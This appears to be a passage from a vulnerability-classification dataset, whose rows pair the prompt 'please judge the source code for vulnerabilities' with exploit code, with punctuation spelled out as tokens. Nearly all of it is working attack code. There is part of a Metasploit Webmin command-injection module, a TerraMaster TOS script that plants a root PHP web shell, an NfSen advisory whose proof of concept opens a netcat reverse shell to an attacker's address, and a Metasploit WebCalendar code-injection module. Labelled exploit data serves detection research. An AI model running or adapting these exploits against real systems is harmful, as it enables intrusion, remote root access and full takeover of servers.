],<NEWLINE><single<underscore>quote>DisclosureDate<single<underscore>quote> => <single<underscore>quote>2019<slash>08<slash>30<single<underscore>quote>,<NEWLINE><single<underscore>quote>DefaultTarget<single<underscore>quote> => 0))<NEWLINE>register<underscore>options(<NEWLINE>[<NEWLINE>OptString.new(<single<underscore>quote>WMPORT<single<underscore>quote>, [ true, <double<underscore>quote>Webmin port<double<underscore>quote>, <single<underscore>quote>10000<single<underscore>quote>]),<NEWLINE>OptString.new(<single<underscore>quote>WMUSER<single<underscore>quote>, [ true, <double<underscore>quote>Webmin username<double<underscore>quote>, <single<underscore>quote>test<single<underscore>quote>]),<NEWLINE>OptString.new(<single<underscore>quote>WMPASS<single<underscore>quote>, [ true, <double<underscore>quote>Webmin password<double<underscore>quote>, <single<underscore>quote>test<single<underscore>quote>]),<NEWLINE>])<NEWLINE>end<NEWLINE>def check<NEWLINE>datastore[<single<underscore>quote>RPORT<single<underscore>quote>] = datastore[<single<underscore>quote>WMPORT<single<underscore>quote>]<NEWLINE>print<underscore>status(<double<underscore>quote>Attempting to login<double<underscore>quote>)<NEWLINE>res = send<underscore>request<underscore>cgi(<NEWLINE>{<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <single<underscore>quote><slash>session<underscore>login.cgi<single<underscore>quote>,<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>POST<single<underscore>quote>,<NEWLINE><single<underscore>quote>vars<underscore>post<single<underscore>quote> =><NEWLINE>{<NEWLINE><single<underscore>quote>user<single<underscore>quote> => datastore[<single<underscore>quote>WMUSER<single<underscore>quote>],<NEWLINE><single<underscore>quote>pass<single<underscore>quote> => datastore[<single<underscore>quote>WMPASS<single<underscore>quote>],<NEWLINE><single<underscore>quote>save<single<underscore>quote> => <single<underscore>quote>1<single<underscore>quote><NEWLINE>},<NEWLINE><single<underscore>quote>cookie<single<underscore>quote> => <double<underscore>quote>redirect=1; testing=1; sessiontest=1;<double<underscore>quote><NEWLINE>})<NEWLINE>if ( res and res.headers[<single<underscore>quote>Set<hyphen>Cookie<single<underscore>quote>] )<NEWLINE>if ( <slash>sid=<slash>.match(res.headers[<single<underscore>quote>Set<hyphen>Cookie<single<underscore>quote>]) )<NEWLINE>sid = <slash>sid=([a<hyphen>z0<hyphen>9]+);<slash>.match(res.headers[<single<underscore>quote>Set<hyphen>Cookie<single<underscore>quote>])[1]<NEWLINE>print<underscore>good(<double<underscore>quote>Login was successful<double<underscore>quote>)<NEWLINE>else<NEWLINE>print<underscore>bad(<double<underscore>quote>Unable to login<double<underscore>quote>)<NEWLINE>return Exploit::CheckCode::Safe<NEWLINE>end<NEWLINE>else<NEWLINE>print<underscore>bad(<double<underscore>quote>Unexpected response<double<underscore>quote>)<NEWLINE>return Exploit::CheckCode::Safe<NEWLINE>end<NEWLINE>print<underscore>status(<double<underscore>quote>Checking if host is vulnerable<double<underscore>quote>)<NEWLINE>res = send<underscore>request<underscore>cgi({<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <single<underscore>quote><slash>rpc.cgi<single<underscore>quote>,<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>POST<single<underscore>quote>,<NEWLINE><single<underscore>quote>headers<single<underscore>quote> =><NEWLINE>{<NEWLINE><single<underscore>quote>Referer<single<underscore>quote> => <single<underscore>quote>http:<slash><slash><single<underscore>quote> + datastore[<single<underscore>quote>RHOST<single<underscore>quote>] + <single<underscore>quote>:<single<underscore>quote> + datastore[<single<underscore>quote>RPORT<single<underscore>quote>].to<underscore>s<NEWLINE>},<NEWLINE><single<underscore>quote>data<single<underscore>quote> => <single<underscore>quote>OBJECT CGI;print <double<underscore>quote>Content<hyphen>Type: text<slash>metasploit<backslash>n<backslash>n<double<underscore>quote><single<underscore>quote>,<NEWLINE><single<underscore>quote>cookie<single<underscore>quote> => <single<underscore>quote>redirect=1; testing=1; sessiontest=1; sid=<single<underscore>quote> + sid<NEWLINE>})<NEWLINE>if ( res.headers[<single<underscore>quote>Content<hyphen>Type<single<underscore>quote>] and res.headers[<single<underscore>quote>Content<hyphen>Type<single<underscore>quote>] == <double<underscore>quote>text<slash>metasploit<double<underscore>quote> )<NEWLINE>return Exploit::CheckCode::Vulnerable<NEWLINE>else<NEWLINE>return Exploit::CheckCode::Safe<NEWLINE>end<NEWLINE>end<NEWLINE>def exploit<NEWLINE>datastore[<single<underscore>quote>RPORT<single<underscore>quote>] = datastore[<single<underscore>quote>WMPORT<single<underscore>quote>]<NEWLINE>print<underscore>status(<double<underscore>quote>Attempting to login<double<underscore>quote>)<NEWLINE>res = send<underscore>request<underscore>cgi(<NEWLINE>{<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <single<underscore>quote><slash>session<underscore>login.cgi<single<underscore>quote>,<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>POST<single<underscore>quote>,<NEWLINE><single<underscore>quote>vars<underscore>post<single<underscore>quote> =><NEWLINE>{<NEWLINE><single<underscore>quote>user<single<underscore>quote> => datastore[<single<underscore>quote>WMUSER<single<underscore>quote>],<NEWLINE><single<underscore>quote>pass<single<underscore>quote> => datastore[<single<underscore>quote>WMPASS<single<underscore>quote>],<NEWLINE><single<underscore>quote>save<single<underscore>quote> => <single<underscore>quote>1<single<underscore>quote><NEWLINE>},<NEWLINE><single<underscore>quote>cookie<single<underscore>quote> => <double<underscore>quote>redirect=1; testing=1; sessiontest=1;<double<underscore>quote><NEWLINE>})<NEWLINE>if ( res and res.headers[<single<underscore>quote>Set<hyphen>Cookie<single<underscore>quote>] )<NEWLINE>if ( <slash>sid=<slash>.match(res.headers[<single<underscore>quote>Set<hyphen>Cookie<single<underscore>quote>]) )<NEWLINE>sid = <slash>sid=([a<hyphen>z0<hyphen>9]+);<slash>.match(res.headers[<single<underscore>quote>Set<hyphen>Cookie<single<underscore>quote>])[1]<NEWLINE>print<underscore>good(<double<underscore>quote>Login was successful<double<underscore>quote>)<NEWLINE>else<NEWLINE>print<underscore>bad(<double<underscore>quote>Unable to login<double<underscore>quote>)<NEWLINE>return<NEWLINE>end<NEWLINE>else<NEWLINE>print<underscore>bad(<double<underscore>quote>Unexpected response<double<underscore>quote>)<NEWLINE>return<NEWLINE>end<NEWLINE>print<underscore>status(<double<underscore>quote>Sending selected payload<double<underscore>quote>)<NEWLINE>hex = <single<underscore>quote><backslash>x<single<underscore>quote> + payload.encoded.scan(<slash>.<slash>).map{ |x| x.unpack(<single<underscore>quote>H*<single<underscore>quote>) }.join(<single<underscore>quote><backslash>x<single<underscore>quote>)<NEWLINE>res = send<underscore>request<underscore>cgi({<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <single<underscore>quote><slash>rpc.cgi<single<underscore>quote>,<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>POST<single<underscore>quote>,<NEWLINE><single<underscore>quote>headers<single<underscore>quote> =><NEWLINE>{<NEWLINE><single<underscore>quote>Referer<single<underscore>quote> => <single<underscore>quote>https:<slash><slash><single<underscore>quote> + datastore[<single<underscore>quote>RHOST<single<underscore>quote>] + <single<underscore>quote>:<single<underscore>quote> + datastore[<single<underscore>quote>RPORT<single<underscore>quote>].to<underscore>s<NEWLINE>},<NEWLINE><single<underscore>quote>data<single<underscore>quote> => <single<underscore>quote>OBJECT CGI;`<single<underscore>quote> + hex + <single<underscore>quote>`<single<underscore>quote>,<NEWLINE><single<underscore>quote>cookie<single<underscore>quote> => <single<underscore>quote>redirect=1; testing=1; sessiontest=1; sid=<single<underscore>quote> + sid<NEWLINE>})<NEWLINE>end<NEWLINE>end | 1 |
please judge the source code for vulnerabilities. | import argparse<NEWLINE>import requests<NEWLINE>import time<NEWLINE>import sys<NEWLINE>import urllib.parse<NEWLINE>from requests.packages.urllib3.exceptions import InsecureRequestWarning<NEWLINE>requests.packages.urllib3.disable<underscore>warnings(InsecureRequestWarning)<NEWLINE>parser = argparse.ArgumentParser(description=<double<underscore>quote>TerraMaster TOS <= 4.2.06 Unauth RCE<double<underscore>quote>)<NEWLINE>parser.add<underscore>argument(<single<underscore>quote><hyphen><hyphen>url<single<underscore>quote>, action=<single<underscore>quote>store<single<underscore>quote>, dest=<single<underscore>quote>url<single<underscore>quote>, required=True, help=<double<underscore>quote>Full URL and port e.g.: http:<slash><slash>192.168.1.111:8081<slash><double<underscore>quote>)<NEWLINE>args = parser.parse<underscore>args()<NEWLINE>url = args.url<NEWLINE>headers = {<single<underscore>quote>User<hyphen>agent<single<underscore>quote>:<single<underscore>quote>Mozilla<slash>5.0 (Windows NT 10.0; Win64; x64) AppleWebKit<slash>537.36 (KHTML, like Gecko) Chrome<slash>72.0.3626.121 Safari<slash>537.36<single<underscore>quote>}<NEWLINE>epoch<underscore>time = int(time.time())<NEWLINE>shell<underscore>filename = <double<underscore>quote>debug<double<underscore>quote>+str(epoch<underscore>time)+<double<underscore>quote>.php<double<underscore>quote><NEWLINE>def check<underscore>endpoint(url, headers):<NEWLINE>response = requests.get(url+<single<underscore>quote><slash>version<single<underscore>quote>, headers=headers, verify=False)<NEWLINE>if response.status<underscore>code == 200:<NEWLINE>print(<double<underscore>quote>[+] TerraMaster TOS version: <double<underscore>quote>, str(response.content))<NEWLINE>else:<NEWLINE>print(<double<underscore>quote><backslash>n[<hyphen>] TerraMaster TOS response code: <double<underscore>quote>, response.status<underscore>code)<NEWLINE>sys.exit()<NEWLINE>def upload<underscore>shell(url, headers, shell<underscore>filename):<NEWLINE>payload = <double<underscore>quote>http|echo <backslash><double<underscore>quote><?php echo(passthru(<backslash><backslash>$<underscore>GET[<single<underscore>quote>cmd<single<underscore>quote>]));?><backslash><double<underscore>quote> >> <slash>usr<slash>www<slash><double<underscore>quote>+shell<underscore>filename+<double<underscore>quote> && chmod +x <slash>usr<slash>www<slash><double<underscore>quote>+shell<underscore>filename+<double<underscore>quote>||<double<underscore>quote><NEWLINE>payload = urllib.parse.quote(payload, safe=<single<underscore>quote><single<underscore>quote>)<NEWLINE>print(<double<underscore>quote>[<slash>] Uploading shell...<double<underscore>quote>)<NEWLINE>response = requests.get(url+<single<underscore>quote><slash>include<slash>makecvs.php?Event=<single<underscore>quote>+payload, headers=headers, verify=False)<NEWLINE>time.sleep(1)<NEWLINE>response = requests.get(url+<single<underscore>quote><slash><single<underscore>quote>+shell<underscore>filename+<single<underscore>quote>?cmd=id<single<underscore>quote>, headers=headers, verify=False)<NEWLINE>if (<single<underscore>quote>uid=0(root) gid=0(root)<single<underscore>quote> in str(response.content, <single<underscore>quote>utf<hyphen>8<single<underscore>quote>)):<NEWLINE>print(<double<underscore>quote>[+] Upload succeeded<double<underscore>quote>)<NEWLINE>else:<NEWLINE>print(<double<underscore>quote><backslash>n[<hyphen>] Error uploading shell: <double<underscore>quote>, response.content)<NEWLINE>sys.exit()<NEWLINE>def interactive<underscore>shell(url, headers, shell<underscore>filename, cmd):<NEWLINE>response = requests.get(url+<single<underscore>quote><slash><single<underscore>quote>+shell<underscore>filename+<single<underscore>quote>?cmd=<single<underscore>quote>+urllib.parse.quote(cmd, safe=<single<underscore>quote><single<underscore>quote>), headers=headers, verify=False)<NEWLINE>print(str(response.text)+<double<underscore>quote><backslash>n<double<underscore>quote>)<NEWLINE>def delete<underscore>shell(url, headers, shell<underscore>filename):<NEWLINE>delcmd = <double<underscore>quote>rm <slash>usr<slash>www<slash><double<underscore>quote>+shell<underscore>filename<NEWLINE>response = requests.get(url+<single<underscore>quote><slash><single<underscore>quote>+shell<underscore>filename+<single<underscore>quote>?cmd=<single<underscore>quote>+urllib.parse.quote(delcmd, safe=<single<underscore>quote><single<underscore>quote>), headers=headers, verify=False)<NEWLINE>print(<double<underscore>quote><backslash>n[+] Shell deleted<double<underscore>quote>)<NEWLINE>check<underscore>endpoint(url, headers)<NEWLINE>upload<underscore>shell(url, headers, shell<underscore>filename)<NEWLINE>try:<NEWLINE>while True:<NEWLINE>cmd = input(<double<underscore>quote><NEWLINE>interactive<underscore>shell(url, headers, shell<underscore>filename, cmd)<NEWLINE>except:<NEWLINE>delete<underscore>shell(url, headers, shell<underscore>filename) | 1 |
please judge the source code for vulnerabilities. | 1. Description<NEWLINE>A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request with shell commands which will be executed as root on a vulnerable system. The injection is covered by CVE<hyphen>2017<hyphen>7175, and the commands are executed as root due to CVE<hyphen>2017<hyphen>6972.<NEWLINE>2. Proof of Concept<NEWLINE>For a reverse shell to attacking machine 10.100.1.2, on the NfSen <slash> AlienVault netflow processing web page, enter the following into the <double<underscore>quote>Custom output format:<double<underscore>quote> input box:<NEWLINE><single<underscore>quote>; nc <hyphen>ne <slash>bin<slash>bash 10.100.1.2 443<NEWLINE>If nc is not installed on the target, then alternative attacks are likely to be possible to leverage the vulnerability.<NEWLINE>3. Solution:<NEWLINE>Update to latest version of NfSen<slash>USM<slash>OSSIM | 1 |
please judge the source code for vulnerabilities. | require <single<underscore>quote>msf<slash>core<single<underscore>quote><NEWLINE>class Metasploit3 < Msf::Exploit::Remote<NEWLINE>Rank = ExcellentRanking<NEWLINE>include Msf::Exploit::Remote::HttpClient<NEWLINE>def initialize(info={})<NEWLINE>super(update<underscore>info(info,<NEWLINE><single<underscore>quote>Name<single<underscore>quote> => <double<underscore>quote>WebCalendar 1.2.4 Pre<hyphen>Auth Remote Code Injection<double<underscore>quote>,<NEWLINE><single<underscore>quote>Description<single<underscore>quote> => %q{<NEWLINE>This modules exploits a vulnerability found in WebCalendar, version 1.2.4 or<NEWLINE>less. If not removed, the settings.php script meant for installation can be<NEWLINE>update by an attacker, and then inject code in it. This allows arbitrary code<NEWLINE>execution as www<hyphen>data.<NEWLINE>},<NEWLINE><single<underscore>quote>License<single<underscore>quote> => MSF<underscore>LICENSE,<NEWLINE><single<underscore>quote>Author<single<underscore>quote> =><NEWLINE>[<NEWLINE><single<underscore>quote>EgiX<single<underscore>quote>,<NEWLINE><single<underscore>quote>sinn3r<single<underscore>quote><NEWLINE>],<NEWLINE><single<underscore>quote>References<single<underscore>quote> =><NEWLINE>[<NEWLINE>[<single<underscore>quote>CVE<single<underscore>quote>, <single<underscore>quote>2012<hyphen>1495<single<underscore>quote>],<NEWLINE>[<single<underscore>quote>URL<single<underscore>quote>, <single<underscore>quote>18775<single<underscore>quote>]<NEWLINE>],<NEWLINE><single<underscore>quote>Arch<single<underscore>quote> => ARCH<underscore>CMD,<NEWLINE><single<underscore>quote>Platform<single<underscore>quote> => [<single<underscore>quote>unix<single<underscore>quote>, <single<underscore>quote>linux<single<underscore>quote>],<NEWLINE><single<underscore>quote>Compat<single<underscore>quote> =><NEWLINE>{<NEWLINE><single<underscore>quote>PayloadType<single<underscore>quote> => <single<underscore>quote>cmd<single<underscore>quote><NEWLINE>},<NEWLINE><single<underscore>quote>Targets<single<underscore>quote> =><NEWLINE>[<NEWLINE>[<single<underscore>quote>WebCalendar 1.2.4 on Linux<single<underscore>quote>, {}],<NEWLINE>],<NEWLINE><single<underscore>quote>Privileged<single<underscore>quote> => false,<NEWLINE><single<underscore>quote>DisclosureDate<single<underscore>quote> => <double<underscore>quote>Apr 23 2012<double<underscore>quote>,<NEWLINE><single<underscore>quote>DefaultTarget<single<underscore>quote> => 0))<NEWLINE>register<underscore>options(<NEWLINE>[<NEWLINE>OptString.new(<single<underscore>quote>TARGETURI<single<underscore>quote>, [true, <single<underscore>quote>The URI path to webcalendar<single<underscore>quote>, <single<underscore>quote><slash>WebCalendar<hyphen>1.2.4<slash><single<underscore>quote>])<NEWLINE>], self.class)<NEWLINE>end<NEWLINE>def check<NEWLINE>uri = target<underscore>uri.path<NEWLINE>uri << <single<underscore>quote><slash><single<underscore>quote> if uri[<hyphen>1, 1] != <single<underscore>quote><slash><single<underscore>quote><NEWLINE>res = send<underscore>request<underscore>raw({<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>GET<single<underscore>quote>,<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <double<underscore>quote><NEWLINE>})<NEWLINE>if res and res.body =~ <slash>WebCalendar v1.2.<backslash>d<slash><NEWLINE>return Exploit::CheckCode::Vulnerable<NEWLINE>else<NEWLINE>return Exploit::CheckCode::Safe<NEWLINE>end<NEWLINE>end<NEWLINE>def exploit<NEWLINE>peer = <double<underscore>quote><NEWLINE>uri = target<underscore>uri.path<NEWLINE>uri << <single<underscore>quote><slash><single<underscore>quote> if uri[<hyphen>1, 1] != <single<underscore>quote><slash><single<underscore>quote><NEWLINE>print<underscore>status(<double<underscore>quote><NEWLINE>post<underscore>data = <double<underscore>quote>app<underscore>settings=1<double<underscore>quote><NEWLINE>post<underscore>data << <double<underscore>quote>&form<underscore>user<underscore>inc=user.php<double<underscore>quote><NEWLINE>post<underscore>data << <double<underscore>quote>&form<underscore>single<underscore>user<underscore>login=*<slash>print(<underscore><underscore><underscore><underscore>);passthru(base64<underscore>decode($<underscore>SERVER[HTTP<underscore>CMD]));die;<double<underscore>quote><NEWLINE>post<underscore>data << <double<underscore>quote><backslash>n<double<underscore>quote>*2<NEWLINE>send<underscore>request<underscore>cgi({<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>POST<single<underscore>quote>,<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <double<underscore>quote><NEWLINE><single<underscore>quote>data<single<underscore>quote> => post<underscore>data<NEWLINE>})<NEWLINE>print<underscore>status(<double<underscore>quote><NEWLINE>send<underscore>request<underscore>raw({<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>GET<single<underscore>quote>,<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <double<underscore>quote><NEWLINE><single<underscore>quote>headers<single<underscore>quote> => {<NEWLINE><single<underscore>quote>Cmd<single<underscore>quote> => Rex::Text.encode<underscore>base64(payload.encoded)<NEWLINE>}<NEWLINE>})<NEWLINE>handler<NEWLINE>end<NEWLINE>end | 1 |
README.md exists but content is empty.
- Downloads last month
- 20